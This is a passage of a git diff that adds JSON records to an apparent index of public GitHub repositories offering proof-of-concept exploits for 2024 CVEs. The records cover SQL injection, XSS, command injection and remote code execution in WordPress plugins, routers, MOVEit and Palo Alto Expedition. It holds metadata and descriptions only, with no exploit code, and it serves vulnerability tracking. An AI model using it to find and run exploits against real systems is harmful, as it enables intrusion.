"https:\/\/github.com\/mistymntncop\/CVE-2024-5274", + "description": null, + "fork": false, + "created_at": "2024-08-29T11:58:25Z", + "updated_at": "2024-11-24T10:21:51Z", + "pushed_at": "2024-08-30T01:15:43Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 75, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52940.json b/2024/CVE-2024-52940.json new file mode 100644 index 0000000000..3e57accae5 --- /dev/null +++ b/2024/CVE-2024-52940.json @@ -0,0 +1,45 @@ +[ + { + "id": 879314420, + "name": "abdal-anydesk-remote-ip-detector", + "full_name": "ebrasha\/abdal-anydesk-remote-ip-detector", + "owner": { + "login": "ebrasha", + "id": 9009001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9009001?v=4", + "html_url": "https:\/\/github.com\/ebrasha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ebrasha\/abdal-anydesk-remote-ip-detector", + "description": "CVE-2024-52940 - A zero-day vulnerability in AnyDesk's \"Allow Direct Connections\" feature, discovered and registered by Ebrahim Shafiei (EbraSha), exposing public and private IP addresses. For details, visit the NVD, Tenable, or MITRE pages.", + "fork": false, + "created_at": "2024-10-27T15:29:56Z", + "updated_at": "2024-11-28T16:05:55Z", + "pushed_at": "2024-11-18T15:09:32Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": true, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abdal", + "abdal-security-group", + "anydesk", + "anydesk-ip-leak-vulnerability", + "cve-2024-52940", + "ebrahim-shafiei", + "ebrasha", + "ip-leak", + "vulnerability", + "zero-day", + "zero-day-vulnerability" + ], + "visibility": "public", + "forks": 10, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5324.json b/2024/CVE-2024-5324.json new file mode 100644 index 0000000000..c17d7cd9cd --- /dev/null +++ b/2024/CVE-2024-5324.json @@ -0,0 +1,37 @@ +[ + { + "id": 811264259, + "name": "CVE-2024-5324", + "full_name": "RandomRobbieBF\/CVE-2024-5324", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-5324", + "description": "Login\/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - Missing Authorization to Arbitrary Options Update", + "fork": false, + "created_at": "2024-06-06T09:01:46Z", + "updated_at": "2024-10-18T17:57:44Z", + "pushed_at": "2024-06-06T09:05:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-5324", + "easy-login-woocommerce", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53255.json b/2024/CVE-2024-53255.json new file mode 100644 index 0000000000..2a10256dbf --- /dev/null +++ b/2024/CVE-2024-53255.json @@ -0,0 +1,33 @@ +[ + { + "id": 894399924, + "name": "CVE-2024-53255", + "full_name": "0x4M3R\/CVE-2024-53255", + "owner": { + "login": "0x4M3R", + "id": 163415000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163415000?v=4", + "html_url": "https:\/\/github.com\/0x4M3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4M3R\/CVE-2024-53255", + "description": "boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)", + "fork": false, + "created_at": "2024-11-26T09:41:54Z", + "updated_at": "2024-11-26T09:45:42Z", + "pushed_at": "2024-11-26T09:45:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5326.json b/2024/CVE-2024-5326.json new file mode 100644 index 0000000000..7e8cec0173 --- /dev/null +++ b/2024/CVE-2024-5326.json @@ -0,0 +1,64 @@ +[ + { + "id": 808885711, + "name": "CVE-2024-5326-Poc", + "full_name": "truonghuuphuc\/CVE-2024-5326-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-5326-Poc", + "description": "CVE-2024-5326 Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX <= 4.1.2 - Missing Authorization to Arbitrary Options Update", + "fork": false, + "created_at": "2024-06-01T04:23:54Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-06-01T04:39:02Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815016982, + "name": "CVE-2024-5326-Poc", + "full_name": "cve-2024\/CVE-2024-5326-Poc", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-5326-Poc", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:12:29Z", + "updated_at": "2024-06-14T07:15:23Z", + "pushed_at": "2024-06-14T07:15:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-53375.json b/2024/CVE-2024-53375.json new file mode 100644 index 0000000000..377f35acb3 --- /dev/null +++ b/2024/CVE-2024-53375.json @@ -0,0 +1,33 @@ +[ + { + "id": 867639922, + "name": "CVE-2024-53375", + "full_name": "ThottySploity\/CVE-2024-53375", + "owner": { + "login": "ThottySploity", + "id": 119318084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119318084?v=4", + "html_url": "https:\/\/github.com\/ThottySploity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThottySploity\/CVE-2024-53375", + "description": "TP-Link Archer AXE75 Authenticated Command Injection", + "fork": false, + "created_at": "2024-10-04T12:49:19Z", + "updated_at": "2024-11-25T19:36:35Z", + "pushed_at": "2024-11-23T00:33:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5356.json b/2024/CVE-2024-5356.json new file mode 100644 index 0000000000..825f7434fa --- /dev/null +++ b/2024/CVE-2024-5356.json @@ -0,0 +1,33 @@ +[ + { + "id": 856122118, + "name": "Aj-Report-sql-CVE-2024-5356-POC", + "full_name": "droyuu\/Aj-Report-sql-CVE-2024-5356-POC", + "owner": { + "login": "droyuu", + "id": 164647533, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164647533?v=4", + "html_url": "https:\/\/github.com\/droyuu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/droyuu\/Aj-Report-sql-CVE-2024-5356-POC", + "description": null, + "fork": false, + "created_at": "2024-09-12T03:02:20Z", + "updated_at": "2024-09-20T02:47:37Z", + "pushed_at": "2024-09-12T03:20:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5420.json b/2024/CVE-2024-5420.json new file mode 100644 index 0000000000..87ed615f3b --- /dev/null +++ b/2024/CVE-2024-5420.json @@ -0,0 +1,64 @@ +[ + { + "id": 851185555, + "name": "CVE-2024-5420-XSS", + "full_name": "gh-ost00\/CVE-2024-5420-XSS", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-5420-XSS", + "description": "SEH utnserver Pro\/ProMAX \/ INU-100 20.1.22 - XSS ", + "fork": false, + "created_at": "2024-09-02T15:29:22Z", + "updated_at": "2024-09-23T12:29:44Z", + "pushed_at": "2024-09-02T15:38:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851215428, + "name": "CVE-2024-5420_XSS", + "full_name": "K4yd0\/CVE-2024-5420_XSS", + "owner": { + "login": "K4yd0", + "id": 79024172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79024172?v=4", + "html_url": "https:\/\/github.com\/K4yd0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K4yd0\/CVE-2024-5420_XSS", + "description": null, + "fork": false, + "created_at": "2024-09-02T16:39:59Z", + "updated_at": "2024-09-02T17:52:09Z", + "pushed_at": "2024-09-02T17:52:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5452.json b/2024/CVE-2024-5452.json new file mode 100644 index 0000000000..05b02abf89 --- /dev/null +++ b/2024/CVE-2024-5452.json @@ -0,0 +1,33 @@ +[ + { + "id": 892465914, + "name": "cve-2024-5452-poc", + "full_name": "XiaomingX\/cve-2024-5452-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-5452-poc", + "description": "此漏洞的根本原因是**深度差异库(deepdiff)**在反序列化用户输入时,未正确处理双下划线(dunder)属性。 PyTorch Lightning 使用 deepdiff.Delta 对象根据前端操作修改应用状态,设计目标是仅允许特定状态变量的修改。", + "fork": false, + "created_at": "2024-11-22T06:56:12Z", + "updated_at": "2024-11-22T11:49:41Z", + "pushed_at": "2024-11-22T06:56:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5522.json b/2024/CVE-2024-5522.json new file mode 100644 index 0000000000..021b43b3d2 --- /dev/null +++ b/2024/CVE-2024-5522.json @@ -0,0 +1,110 @@ +[ + { + "id": 808441201, + "name": "CVE-2024-5522-Poc", + "full_name": "truonghuuphuc\/CVE-2024-5522-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-5522-Poc", + "description": "CVE-2024-5522 HTML5 Video Player <= 2.5.26 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-05-31T04:41:46Z", + "updated_at": "2024-07-24T14:22:31Z", + "pushed_at": "2024-05-31T06:44:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855566883, + "name": "CVE-2024-5522-PoC", + "full_name": "kryptonproject\/CVE-2024-5522-PoC", + "owner": { + "login": "kryptonproject", + "id": 147995594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147995594?v=4", + "html_url": "https:\/\/github.com\/kryptonproject", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kryptonproject\/CVE-2024-5522-PoC", + "description": null, + "fork": false, + "created_at": "2024-09-11T04:46:46Z", + "updated_at": "2024-09-11T05:46:06Z", + "pushed_at": "2024-09-11T05:46:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 866079798, + "name": "CVE-2024-5522", + "full_name": "geniuszlyy\/CVE-2024-5522", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2024-5522", + "description": "A PoC exploit scanner for CVE-2024-5522 vulnerability in WordPress websites", + "fork": false, + "created_at": "2024-10-01T16:02:12Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-10-01T16:03:38Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-5522", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "poc", + "security", + "vulnerability", + "vulnerability-research", + "wordpress", + "wp" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5633.json b/2024/CVE-2024-5633.json new file mode 100644 index 0000000000..7a58c5e48e --- /dev/null +++ b/2024/CVE-2024-5633.json @@ -0,0 +1,33 @@ +[ + { + "id": 831860560, + "name": "CVE-2024-5633", + "full_name": "Adikso\/CVE-2024-5633", + "owner": { + "login": "Adikso", + "id": 1407751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1407751?v=4", + "html_url": "https:\/\/github.com\/Adikso", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Adikso\/CVE-2024-5633", + "description": "PoC for CVE-2024-5633", + "fork": false, + "created_at": "2024-07-21T20:27:24Z", + "updated_at": "2024-08-13T18:11:16Z", + "pushed_at": "2024-07-21T20:30:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5735.json b/2024/CVE-2024-5735.json new file mode 100644 index 0000000000..0d5bd3dcff --- /dev/null +++ b/2024/CVE-2024-5735.json @@ -0,0 +1,33 @@ +[ + { + "id": 821339567, + "name": "CVE-2024-5735", + "full_name": "afine-com\/CVE-2024-5735", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-5735", + "description": "AdmirorFrames Joomla! Extension < 5.0 - Full Path Disclosure", + "fork": false, + "created_at": "2024-06-28T10:15:17Z", + "updated_at": "2024-06-28T10:25:21Z", + "pushed_at": "2024-06-28T10:22:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5736.json b/2024/CVE-2024-5736.json new file mode 100644 index 0000000000..e09b22a95d --- /dev/null +++ b/2024/CVE-2024-5736.json @@ -0,0 +1,33 @@ +[ + { + "id": 821343649, + "name": "CVE-2024-5736", + "full_name": "afine-com\/CVE-2024-5736", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-5736", + "description": "AdmirorFrames Joomla! Extension < 5.0 - Server-Side Request Forgery", + "fork": false, + "created_at": "2024-06-28T10:27:08Z", + "updated_at": "2024-06-28T10:37:25Z", + "pushed_at": "2024-06-28T10:35:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5737.json b/2024/CVE-2024-5737.json new file mode 100644 index 0000000000..0e22196df0 --- /dev/null +++ b/2024/CVE-2024-5737.json @@ -0,0 +1,33 @@ +[ + { + "id": 821343815, + "name": "CVE-2024-5737", + "full_name": "afine-com\/CVE-2024-5737", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-5737", + "description": "AdmirorFrames Joomla! Extension < 5.0 - HTML Injection", + "fork": false, + "created_at": "2024-06-28T10:27:35Z", + "updated_at": "2024-06-28T10:37:10Z", + "pushed_at": "2024-06-28T10:36:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5764.json b/2024/CVE-2024-5764.json new file mode 100644 index 0000000000..9c29888253 --- /dev/null +++ b/2024/CVE-2024-5764.json @@ -0,0 +1,33 @@ +[ + { + "id": 888675608, + "name": "CVE-2024-5764", + "full_name": "fin3ss3g0d\/CVE-2024-5764", + "owner": { + "login": "fin3ss3g0d", + "id": 62859381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62859381?v=4", + "html_url": "https:\/\/github.com\/fin3ss3g0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fin3ss3g0d\/CVE-2024-5764", + "description": "CVE-2024-5764 exploitation script", + "fork": false, + "created_at": "2024-11-14T20:08:45Z", + "updated_at": "2024-11-20T16:31:10Z", + "pushed_at": "2024-11-14T20:11:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5806.json b/2024/CVE-2024-5806.json new file mode 100644 index 0000000000..b6a90e5a72 --- /dev/null +++ b/2024/CVE-2024-5806.json @@ -0,0 +1,33 @@ +[ + { + "id": 819504418, + "name": "watchTowr-vs-progress-moveit_CVE-2024-5806", + "full_name": "watchtowrlabs\/watchTowr-vs-progress-moveit_CVE-2024-5806", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/watchTowr-vs-progress-moveit_CVE-2024-5806", + "description": "Exploit for the CVE-2024-5806", + "fork": false, + "created_at": "2024-06-24T16:28:35Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-06-24T16:52:12Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 40, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5910.json b/2024/CVE-2024-5910.json new file mode 100644 index 0000000000..4986751bb4 --- /dev/null +++ b/2024/CVE-2024-5910.json @@ -0,0 +1,33 @@ +[ + { + "id": 889262902, + "name": "Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464", + "full_name": "p33d\/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464", + "description": null, + "fork": false, + "created_at": "2024-11-15T23:46:01Z", + "updated_at": "2024-11-15T23:46:01Z", + "pushed_at": "2024-11-15T23:46:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5932.json b/2024/CVE-2024-5932.json new file mode 100644 index 0000000000..19f0502a02 --- /dev/null +++ b/2024/CVE-2024-5932.json @@ -0,0 +1,106 @@ +[ + { + "id": 845461331, + "name": "CVE-2024-5932-PoC", + "full_name": "0xb0mb3r\/CVE-2024-5932-PoC", + "owner": { + "login": "0xb0mb3r", + "id": 177725137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177725137?v=4", + "html_url": "https:\/\/github.com\/0xb0mb3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xb0mb3r\/CVE-2024-5932-PoC", + "description": "Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection ", + "fork": false, + "created_at": "2024-08-21T09:51:21Z", + "updated_at": "2024-11-20T16:31:02Z", + "pushed_at": "2024-08-22T15:20:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847287273, + "name": "CVE-2024-5932", + "full_name": "EQSTLab\/CVE-2024-5932", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-5932", + "description": "Proof-of-Concept for CVE-2024-5932", + "fork": false, + "created_at": "2024-08-25T11:51:36Z", + "updated_at": "2024-11-27T14:59:21Z", + "pushed_at": "2024-08-29T02:13:12Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-5932", + "exploit", + "givewp", + "object-injection", + "php", + "poc", + "proof-of-concept", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 10, + "watchers": 51, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871074593, + "name": "cve-2024-5932", + "full_name": "OxLmahdi\/cve-2024-5932", + "owner": { + "login": "OxLmahdi", + "id": 159675795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159675795?v=4", + "html_url": "https:\/\/github.com\/OxLmahdi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OxLmahdi\/cve-2024-5932", + "description": null, + "fork": false, + "created_at": "2024-10-11T08:12:38Z", + "updated_at": "2024-11-05T16:05:18Z", + "pushed_at": "2024-10-11T08:32:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5947.json b/2024/CVE-2024-5947.json new file mode 100644 index 0000000000..e64e5c54ee --- /dev/null +++ b/2024/CVE-2024-5947.json @@ -0,0 +1,33 @@ +[ + { + "id": 825338684, + "name": "CVE-2024-5947", + "full_name": "Cappricio-Securities\/CVE-2024-5947", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-5947", + "description": "Deep Sea Electronics DSE855 - Authentication Bypass", + "fork": false, + "created_at": "2024-07-07T14:03:49Z", + "updated_at": "2024-07-07T14:10:53Z", + "pushed_at": "2024-07-07T14:10:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5961.json b/2024/CVE-2024-5961.json new file mode 100644 index 0000000000..c4863b9610 --- /dev/null +++ b/2024/CVE-2024-5961.json @@ -0,0 +1,33 @@ +[ + { + "id": 822555530, + "name": "CVE-2024-5961", + "full_name": "kac89\/CVE-2024-5961", + "owner": { + "login": "kac89", + "id": 5662731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5662731?v=4", + "html_url": "https:\/\/github.com\/kac89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kac89\/CVE-2024-5961", + "description": "Reflected XSS in 2ClickPortal", + "fork": false, + "created_at": "2024-07-01T11:17:48Z", + "updated_at": "2024-07-01T14:35:08Z", + "pushed_at": "2024-07-01T14:35:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6028.json b/2024/CVE-2024-6028.json new file mode 100644 index 0000000000..dcf3e30e9b --- /dev/null +++ b/2024/CVE-2024-6028.json @@ -0,0 +1,33 @@ +[ + { + "id": 819950639, + "name": "CVE-2024-6028-Poc", + "full_name": "truonghuuphuc\/CVE-2024-6028-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-6028-Poc", + "description": "CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Unauthenticated SQL Injection via 'ays_questions' Parameter", + "fork": false, + "created_at": "2024-06-25T13:55:27Z", + "updated_at": "2024-06-30T06:22:14Z", + "pushed_at": "2024-06-26T01:17:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6043.json b/2024/CVE-2024-6043.json new file mode 100644 index 0000000000..a3b043cae0 --- /dev/null +++ b/2024/CVE-2024-6043.json @@ -0,0 +1,36 @@ +[ + { + "id": 843922045, + "name": "CVE-2024-6043", + "full_name": "lfillaz\/CVE-2024-6043", + "owner": { + "login": "lfillaz", + "id": 114345508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114345508?v=4", + "html_url": "https:\/\/github.com\/lfillaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lfillaz\/CVE-2024-6043", + "description": "This Python tool exploits the CVE-2024-6043 vulnerability, which affects the SourceCodester Best House Rental Management System 1.0. The vulnerability allows remote attackers to perform SQL Injection via the `admin_class.php` file, specifically targeting the `username` parameter", + "fork": false, + "created_at": "2024-08-17T20:30:28Z", + "updated_at": "2024-08-22T02:30:08Z", + "pushed_at": 